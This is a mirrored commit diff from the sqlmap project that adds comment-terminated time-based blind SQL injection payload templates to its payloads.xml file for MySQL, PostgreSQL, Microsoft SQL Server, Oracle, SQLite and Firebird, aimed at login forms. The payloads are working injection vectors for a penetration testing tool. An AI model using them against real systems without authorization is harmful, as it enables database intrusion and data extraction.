mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-02-24 07:30:50 +03:00
Improvement to make time-based blind to work also against login forms
This commit is contained in:
Bernardo Damele
parent
b3a0f38f3f
commit
1b3717c79c
184
xml/payloads.xml
184
xml/payloads.xml
|
|
@ -1520,6 +1520,27 @@ Formats:
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>MySQL > 5.0.11 AND time-based blind (comment)</title>
|
||||||
|
<stype>5</stype>
|
||||||
|
<level>4</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,2,3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>AND [RANDNUM]=IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM])</vector>
|
||||||
|
<request>
|
||||||
|
<payload>AND SLEEP([SLEEPTIME])</payload>
|
||||||
|
<comment>#</comment>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<time>[SLEEPTIME]</time>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>MySQL</dbms>
|
||||||
|
<dbms_version>> 5.0.11</dbms_version>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL < 5.0.12 AND time-based blind (heavy query)</title>
|
<title>MySQL < 5.0.12 AND time-based blind (heavy query)</title>
|
||||||
<stype>5</stype>
|
<stype>5</stype>
|
||||||
|
|
@ -1539,6 +1560,26 @@ Formats:
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>MySQL < 5.0.12 AND time-based blind (heavy query - comment)</title>
|
||||||
|
<stype>5</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,2,3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM])</vector>
|
||||||
|
<request>
|
||||||
|
<payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
|
||||||
|
<comment>#</comment>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<time>[DELAYED]</time>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>MySQL</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>PostgreSQL > 8.1 AND time-based blind</title>
|
<title>PostgreSQL > 8.1 AND time-based blind</title>
|
||||||
<stype>5</stype>
|
<stype>5</stype>
|
||||||
|
|
@ -1559,6 +1600,27 @@ Formats:
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>PostgreSQL > 8.1 AND time-based blind (comment)</title>
|
||||||
|
<stype>5</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,2,3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
|
||||||
|
<request>
|
||||||
|
<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
|
||||||
|
<comment>--</comment>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<time>[SLEEPTIME]</time>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>PostgreSQL</dbms>
|
||||||
|
<dbms_version>> 8.1</dbms_version>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>PostgreSQL AND time-based blind (heavy query)</title>
|
<title>PostgreSQL AND time-based blind (heavy query)</title>
|
||||||
<stype>5</stype>
|
<stype>5</stype>
|
||||||
|
|
@ -1578,6 +1640,26 @@ Formats:
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>PostgreSQL AND time-based blind (heavy query - comment)</title>
|
||||||
|
<stype>5</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,2,3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
|
||||||
|
<request>
|
||||||
|
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000))</payload>
|
||||||
|
<comment>--</comment>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<time>[DELAYED]</time>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>PostgreSQL</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>
|
<title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>
|
||||||
<stype>5</stype>
|
<stype>5</stype>
|
||||||
|
|
@ -1597,6 +1679,26 @@ Formats:
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)</title>
|
||||||
|
<stype>5</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,2,3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
|
||||||
|
<request>
|
||||||
|
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
|
||||||
|
<comment>--</comment>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<time>[DELAYED]</time>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Oracle AND time-based blind</title>
|
<title>Oracle AND time-based blind</title>
|
||||||
<stype>5</stype>
|
<stype>5</stype>
|
||||||
|
|
@ -1616,6 +1718,26 @@ Formats:
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>Oracle AND time-based blind (comment)</title>
|
||||||
|
<stype>5</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,2,3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
|
||||||
|
<request>
|
||||||
|
<payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]', [SLEEPTIME])</payload>
|
||||||
|
<comment>--</comment>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<time>[SLEEPTIME]</time>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>Oracle</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Oracle AND time-based blind (heavy query)</title>
|
<title>Oracle AND time-based blind (heavy query)</title>
|
||||||
<stype>5</stype>
|
<stype>5</stype>
|
||||||
|
|
@ -1635,6 +1757,26 @@ Formats:
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>Oracle AND time-based blind (heavy query - comment)</title>
|
||||||
|
<stype>5</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,2,3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) ELSE [RANDNUM] END)</vector>
|
||||||
|
<request>
|
||||||
|
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5)</payload>
|
||||||
|
<comment>--</comment>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<time>[DELAYED]</time>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>Oracle</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>SQLite > 2.0 AND time-based blind (heavy query)</title>
|
<title>SQLite > 2.0 AND time-based blind (heavy query)</title>
|
||||||
<stype>5</stype>
|
<stype>5</stype>
|
||||||
|
|
@ -1655,6 +1797,27 @@ Formats:
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>SQLite > 2.0 AND time-based blind (heavy query - comment)</title>
|
||||||
|
<stype>5</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END)</vector>
|
||||||
|
<request>
|
||||||
|
<payload>AND [RANDNUM]=LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))</payload>
|
||||||
|
<comment>--</comment>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<time>[DELAYED]</time>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>SQLite</dbms>
|
||||||
|
<dbms_version>> 2.0</dbms_version>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Firebird AND time-based blind (heavy query)</title>
|
<title>Firebird AND time-based blind (heavy query)</title>
|
||||||
<stype>5</stype>
|
<stype>5</stype>
|
||||||
|
|
@ -1674,6 +1837,27 @@ Formats:
|
||||||
<dbms_version>>= 2.0</dbms_version>
|
<dbms_version>>= 2.0</dbms_version>
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>Firebird AND time-based blind (heavy query - comment)</title>
|
||||||
|
<stype>5</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3),[RANDNUM])</vector>
|
||||||
|
<request>
|
||||||
|
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3)</payload>
|
||||||
|
<comment>--</comment>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<time>[DELAYED]</time>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>Firebird</dbms>
|
||||||
|
<dbms_version>>= 2.0</dbms_version>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
||||||
<!-- End of AND time-based blind tests -->
|
<!-- End of AND time-based blind tests -->
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue
Block a user